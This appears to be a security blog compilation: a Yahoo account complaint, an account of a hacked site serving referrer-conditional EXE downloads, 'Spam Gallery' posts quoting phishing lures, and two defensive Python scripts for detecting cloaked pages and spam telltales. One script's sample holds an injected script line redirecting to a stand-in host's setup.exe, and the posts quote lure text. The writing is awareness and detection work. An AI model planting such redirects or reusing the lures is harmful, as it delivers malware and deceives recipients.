Yahoo Security Is Still A Joke

Today I got an email from Yahoo.  You know, they’ve been having some security issues lately with millions of accounts being compromised.

The email said they noticed I hadn’t changed my password in a while.  That was kind of odd since I thought I got this email not long ago and humored them by changing my password.  I don’t use Yahoo for anything important anymore, so I didn’t really care.


When I looked at where the email was sent to, it was sent to a non-yahoo email address.  It was sent to an email address I used to log in to Facebook.  Putting it together, this was an account I used to log in to Flickr using the Facebook account login option.  It’s been a while since Yahoo gave the middle finger to external logins because they didn’t want to support them anymore.  But that doesn’t mean they cleared all that data out.

So let’s get this right.  I used to log in to Flickr using a Facebook login.  Yahoo discontinued Facebook login ability.  I can’t remember if I converted to a Yahoo account or abandoned it, but regardless, there is an account in Yahoo’s system that has a Facebook email in it.  I can’t find that email anywhere in my password manager.  Even if I did, there’s no Yahoo password for me to change.  It’s a Facebook login.

I used to be pretty neutral on Yahoo.  I didn’t care one way or the other about them.  That’s changed.  I really want them to close up shop.  They are not doing the world any favors with their lack of security and perpetually changing services.

PHP Hacked Site

While doing a search for something innocuous, I found a search result that was very out of place.  The domain was nothing related to what I was searching for, and the text abstract was, to say the least, spammy.  Although I know you’re not supposed to click things like that, I figure I’m pretty secure, so I clicked it.

I was immediately shown a page that said my download would start in 0 seconds, then I was prompted to download an EXE file.  Uh huh.  I browsed to the root domain and it really was a legitimate website.  So now, I wanted to figure out how this happened.  I navigated to the hacked page and I didn’t get any download prompt.  I went back to the search results and clicked again – I got the download prompt.  Hmmm.  More attempts and sometimes the site would send me to a dead page.


I looked very hard at the source code and couldn’t find the script that was being injected, but I could see there was a comment <!--counter--> that was getting replaced with the download redirect.  I did a site search on Bing and found many, many, many pages on their website that were suspect.  Also, I saw actual website pages that were in PHP.

So, I had to conclude that the website had a hacked version of PHP, and if that was compromised, the server could do anything it wanted, including checking for referrers and replacing tags in the source code files.  The best I could do was email them and let them know they were hacked and that they had to have their webmaster fix it for them.

Upon further research, it looks like it was a Joomla exploit from a couple of years ago.  I passed that info along and hopefully the website owners can make the updates needed (and clean up all the extra pages).
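The referrer-conditional behaviour described above (a normal page on a direct visit, a download redirect when arriving from a search result, and a placeholder comment swapped for the redirect) can be checked for from the outside. The script below is an added example, not code from the original post or from the affected site: it fetches a URL twice, once without a Referer and once with a search-engine Referer, and reports the markup that appears only in the referred copy, plus the line numbers of the placeholder comment in the direct copy so the same scan can be run over a site's own files. The Referer and User-Agent values, the sample HTML and the download host in it are all constructed for illustration.

```python
"""Check a page for referrer-conditional (cloaked) content.

Added example, not code from the original post. Fetches a URL with and
without a search-engine Referer and reports markup present only in the
referred copy. Sample HTML and all URLs below are constructed.
"""
import difflib
import re
import urllib.request
from typing import List, Optional

# Assumed values: any search-result URL and any browser-like UA will do.
SEARCH_REFERER = "https://www.bing.com/search?q=site+check"
USER_AGENT = "Mozilla/5.0 (compatible; cloaking-check/0.1)"
MARKER = "<!--counter-->"  # the placeholder comment named in the post

# Markup that commonly carries a forced redirect or download.
SUSPECT = re.compile(
    r"<script\b|http-equiv=.{0,2}refresh|window\.location|\.exe\b",
    re.IGNORECASE,
)


def fetch(url: str, referer: Optional[str] = None, timeout: int = 15) -> str:
    """Fetch url as text, optionally sending a Referer header (uses the network)."""
    headers = {"User-Agent": USER_AGENT}
    if referer:
        headers["Referer"] = referer
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def injected_lines(direct_html: str, referred_html: str) -> List[str]:
    """Return the non-blank lines present only in the referred copy of the page."""
    direct = direct_html.splitlines()
    referred = referred_html.splitlines()
    matcher = difflib.SequenceMatcher(None, direct, referred)
    added: List[str] = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            added.extend(referred[j1:j2])
    return [line for line in added if line.strip()]


def is_suspicious(lines: List[str]) -> bool:
    """True if any injected line looks like a redirect or a download."""
    return any(SUSPECT.search(line) for line in lines)


def find_marker(html: str, marker: str = MARKER) -> List[int]:
    """1-based line numbers where the placeholder comment appears."""
    return [n for n, line in enumerate(html.splitlines(), 1) if marker in line]


def check(url: str) -> dict:
    """Compare the direct and search-referred copies of url (uses the network)."""
    direct = fetch(url)
    referred = fetch(url, referer=SEARCH_REFERER)
    delta = injected_lines(direct, referred)
    return {
        "url": url,
        "cloaked": bool(delta),
        "suspicious": is_suspicious(delta),
        "marker_lines": find_marker(direct),
        "delta": delta,
    }


# Constructed sample: what a direct visit and a search-referred visit might return.
DIRECT_SAMPLE = """<html><body>
<h1>Company News</h1>
<!--counter-->
<p>Welcome to our site.</p>
</body></html>"""

REFERRED_SAMPLE = """<html><body>
<h1>Company News</h1>
<script>window.location="http://download-host.invalid/setup.exe";</script>
<p>Welcome to our site.</p>
</body></html>"""

if __name__ == "__main__":
    delta = injected_lines(DIRECT_SAMPLE, REFERRED_SAMPLE)
    print("marker at lines:", find_marker(DIRECT_SAMPLE))
    print("injected:", delta, "suspicious:", is_suspicious(delta))
```

Run `check("https://example.invalid/page")` against a real URL to do the live comparison; a non-empty, suspicious delta is the signal to hand to the site owner, and a hit from `find_marker` on a page's own source shows where the substitution hook sits.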

Spam Gallery–Diliver Your Package

A colleague and I were talking at lunch recently about spam and how clever spam and phishing attempts are getting.  But still, there is a long way to go.  One of the biggest failures of spammers is their sheer stupidity.  If they’re going to use a template from a well-known company, why do they insist on changing the wording of the email?  These people don’t have a grasp of the American English language, much less what professional business correspondence looks like.


Starting with the misspelling in the subject, the horrible grammar continues throughout the message.  The point of the email though, is to inform that one of their trucks “is burned tonight”.  This is not a typical business email.

And this spam email suffers from the same problem as every other one.  How did you get my email address? How do you know the package is mine?  I have to assume that people believe that everyone just knows your email address somehow.  Anyone sending you a package seems to implicitly know your email, since UPS and FedEx are sending me package delivery failure email notices all the time.

Spam Gallery–Traffic Violation

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


I received a series of these emails, as usual with slightly different wording.  The email subject, street name and date varied between the messages.

This has the usual signs of spam: no personal information provided, somewhat unusual language (“sanction and fine”, “camera shot”), a sender email address that is not from a domain suggesting an official law enforcement agency, and a single available action – opening the attachment.

Some things you would need to ask about the email:

  • How did the “violation center” get my email from my license plate?
  • How do you pay the fine when there is no payment address?
  • And most importantly, why is the attachment named “cumshot”?

Maybe the email will catch some people out of curiosity.  Even if you know it’s fake or you know it’s not you, you’re still curious as to what the attachment is.  There’s nothing to be gained by opening any attachment from anyone you don’t know.  If someone walked up to you on the street, handed you a USB drive and told you to run whatever program is on that drive, would it be any more logical than opening an attachment from a stranger?

Spammers Getting Angry

There has been some spam going around for quite a while with an infected zip file attachment sent under the guise of being explicit photos found of you or your girlfriend.  The email subjects and bodies had many variations, but were all pretty much the same.  Some samples:

FW:Why did you put this photo online?

Hi ,

I have a question- have you seen this picture of yours in attachment?? Three facebook friends sent it to me today… why did you put it online? wouldn’t it harm your job? what if parents see it? you must be way cooler than I thought about you man :))))

and

Hey ,

But I really need to ask you – is it you at this picture in attachment? I can’t tell you where I got this picture it doesn’t actually matter… The question is is it really you???.

and

Hey ,

I got to show you this picture in attachment. I can’t tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who’s that dude??.

The emails are somewhat casual, friendly, surprised, or impressed.  But recently, these emails have tried a different tactic, fear and anger.  Look at some of the new messages:

These pictures should be taken down immediately.

Sorry to disturb you …
Why did you have to put these photos online? All the hell is gonna break loose now don’t you understant? Take them down immediately! Don’t tell me you don’t know what photos I’m talking about! Check attachment!

This escalated to:

The criminal investigation agains you has started. Grave privacy violation is a serious thing.

Sorry to disturb you …
Why did you try to break into my FB??? This is the reply from FB support in attachment they idendified you as an attacker who tried to steal my password! Do you know that this is crime actually??

and

You’ll reap just what you sow! You’ll be really sorry about what you’ve done to me.

Hate to bother you …
Do you know who posted these photos online?? This is strange cause there’s your FB acc there. Why did you do it and how did you get my photos?? This is a crime actually do you know?? I put one photo in attachment. We have to clear this thing or else I’ll have to contact my lawer!

Other subject lines:

Let’s put this behind us once and for all  I know you broke into my email.
The police investigation is under way now. You’ll be really sorry about what you have done.
How can you be so cruel to me? I’ll have to react and destroy you.
You can’t say I haven’t warned you  now enjoy the consequences.

It could be understandable that an email written in anger would have terrible composition and grammar, which is normally a giveaway for spam.  But like most spam, these emails play off of curiosity, even if you know you’re not the one the attacker is looking for.  Who wouldn’t want to see the picture that’s gotten the author so upset?  The new tactic is to get the recipient in a defensive or worried state so they confirm that it really isn’t them involved in the fake incident.

Spam Gallery–Tutoring Materials

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


This message loses all credibility through misspellings.  In addition, the email address is totally different from the sender’s name (Stacy).  Finally, although the email is addressed to “co-workers”, this email is only sent to one person.

Spam Gallery–Tax Draw Payment

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


Tax time in America, a time of windfall payments to countless people.  Some people see it as their yearly bonus, although it’s actually your own money being returned to you.  So it’s no wonder that a scammer would try to take advantage of this.

The biggest flaw of this email is the use of the term “Tax Draw”, which has no meaning in the U.S.  Other things of note would be:

  • A dollar amount that is ridiculous.  The only thing that this could hope to gain is curiosity.
  • A document that is a ZIP file, not a normal document format.
  • No personal details: no name, account number, contact information.  Not even a thank you.
  • Bare-bones instructions with poor grammar.

If an email isn’t personal, it isn’t for you.  It’s very safe to just ignore it.

Spam Gallery–Your Order For Helicopter

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


This spam message is just pretty humorous.  Here are the things I can see wrong:

  • Poor grammar for a business email.
  • Times in 12hr and 24hr format.
  • Currency incorrectly formatted.
  • Email address of sender inconsistent with name.
  • “Single choice” link in email.
  • No contact information of company.
  • No personalized greeting or other identifying information.

The email may pique curiosity, so that you want to click the link to see what the total cost of renting a helicopter would be.  Think of someone approaching you on the street and saying, “Wanna see a dead body?”

Spam Gallery – Manager

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


This email is clearly spam.  The numerous spelling and grammar errors throughout should be enough to discredit it completely.  Some of the mistakes are strange and humorous.  “Up to 50,000 USD per annum”, after which I guess your pay simply stops?  “Vacant educational training”? “PayPal Manager”?

This spam falls under a similar type as online dating scams, where you voluntarily give information to the scammers.  If you send your resume to this email address, they have quite a good leg up on stealing your identity.  If they want more, they can simply say that you are hired and ask for your SSN and banking information for payroll.  Then what?

This email has no contact information.  There is a name, which is unverifiable.  There is a company name, which doesn’t match the domain of the email address (gmx.us is a free email host).  There is no address, website, or phone number.  This is just like other “single choice” emails, where you can only do one thing in the email, and that is exactly what the spammer wants.

Beware of too-good-to-be-true offers.  If this was a job offer, wouldn’t you want to research the company first?  There are no links to the company website.

Spam Gallery–Reward Notification

The Spam Gallery is a series of posts that give examples of spam messages, explaining the telltale signs of how they are spam.


This piece of mail has an interesting trait of being a forgery of another spam service.  Gift Certificate Delivery.com is probably a legitimate business, but assuredly is one that should not exist.  In any case, this email is using their email template to get you to click the links and get infected.

The email uses the first part of the email address (JSmith, jane.doe) to give it legitimacy, but a real email from a real company would use your real name.  They would have that in their database.  The other clue is that the links all direct to latestyearsvacation.info, which has nothing to do with gift certificates, rewards, or anything else.

One thing that is interesting, though, is that the spammers actually purchased a valid domain name and hosting services to host their infection files.  Usually, the files would be hosted on a hacked legitimate website in a hidden folder so the spammers wouldn’t have to pay anything.

Always check the link addresses, and don’t assume you’re getting something for free.  That’s not the way the world works.
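The telltales called out across the Spam Gallery posts (a sender on a free mail host whose domain does not match the claimed company in the Manager post, links that all lead to a domain unrelated to the sender in the Reward Notification post, a ZIP or other risky attachment as the one offered action in the Tax Draw Payment and Traffic Violation posts, and a greeting built from the recipient's mailbox name rather than a real name) are mechanical enough to check automatically. The script below is an added example, not code from the original posts: it parses a raw message with Python's standard email package and returns the flags that fire. The sample message, its addresses, the `claimed_org` parameter (the company the mail says it is from, supplied by the analyst) and the free-host list are all constructed assumptions; gmx.us and latestyearsvacation.info are reused from the posts.

```python
"""Flag the Spam Gallery telltales in a raw e-mail message.

Added example, not code from the original posts. Reports: free mail host,
claimed company vs sender domain mismatch, links that all point away from
the sender's domain, risky attachment types, and a greeting that reuses the
recipient's mailbox name. The sample message and the host list are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from typing import List, Set, Tuple
from urllib.parse import urlparse

# Assumed list; an analyst would maintain a fuller one.
FREE_MAIL_HOSTS = {"gmx.us", "gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}
RISKY_EXTENSIONS = (".zip", ".exe", ".scr", ".js", ".jar")
URL = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def sender_parts(msg) -> Tuple[str, str, str]:
    """Display name, address and lowercase domain from the From header."""
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    return name, addr, domain


def text_parts(msg) -> List[str]:
    """Decoded text/plain and text/html bodies."""
    out = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            out.append(part.get_payload(decode=True).decode("utf-8", "replace"))
    return out


def link_domains(msg) -> Set[str]:
    """Hostnames of every URL found in the message bodies."""
    hosts = set()
    for body in text_parts(msg):
        for url in URL.findall(body):
            host = urlparse(url).hostname
            if host:
                hosts.add(host.lower())
    return hosts


def attachment_names(msg) -> List[str]:
    """Filenames of every attached part."""
    return [p.get_filename() for p in msg.walk() if p.get_filename()]


def telltales(raw: str, recipient: str, claimed_org: str = "") -> List[str]:
    """Return human-readable flags; an empty list means none fired."""
    msg = message_from_string(raw)
    flags: List[str] = []
    _name, _addr, domain = sender_parts(msg)

    if domain in FREE_MAIL_HOSTS:
        flags.append(f"sender uses free mail host {domain}")

    # The sender domain's first label should appear in the company it claims to be.
    label = domain.split(".")[0]
    if claimed_org and label not in claimed_org.lower().replace(" ", ""):
        flags.append(f"claimed company '{claimed_org}' does not match sender domain {domain}")

    hosts = link_domains(msg)
    foreign = {h for h in hosts if h != domain and not h.endswith("." + domain)}
    if hosts and foreign == hosts:
        flags.append("links point only to " + ", ".join(sorted(foreign))
                     + f", unrelated to sender domain {domain}")

    for fn in attachment_names(msg):
        if fn.lower().endswith(RISKY_EXTENSIONS):
            flags.append(f"risky attachment {fn}")

    # A real correspondent uses your name, not the part of your address before the @.
    local = recipient.split("@", 1)[0].lower()
    head = " ".join(text_parts(msg))[:300].lower()
    if local and local in head:
        flags.append(f"greeting reuses the mailbox name '{local}' instead of a real name")

    return flags


# Constructed sample combining the traits from several posts.
SAMPLE_EMAIL = """\
From: "PayPal Manager" <hr-department@gmx.us>
To: jsmith@example.com
Subject: Reward Notification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<p>Dear JSmith,</p>
<p>Your reward is ready. <a href="http://latestyearsvacation.info/claim">Claim now</a></p>
--b1
Content-Type: application/zip; name="Tax_Draw_Payment.zip"
Content-Disposition: attachment; filename="Tax_Draw_Payment.zip"
Content-Transfer-Encoding: base64

UEsDBAoAAAAAAA==
--b1--
"""

if __name__ == "__main__":
    for flag in telltales(SAMPLE_EMAIL, "jsmith@example.com", claimed_org="PayPal"):
        print("-", flag)
```

Feed it a saved .eml and the recipient address; the checks are deliberately simple string and header tests, so a message that trips several of them is the kind of "single choice" mail the posts describe, while a legitimate notice from a company's own domain with your real name and no archive attachment trips none.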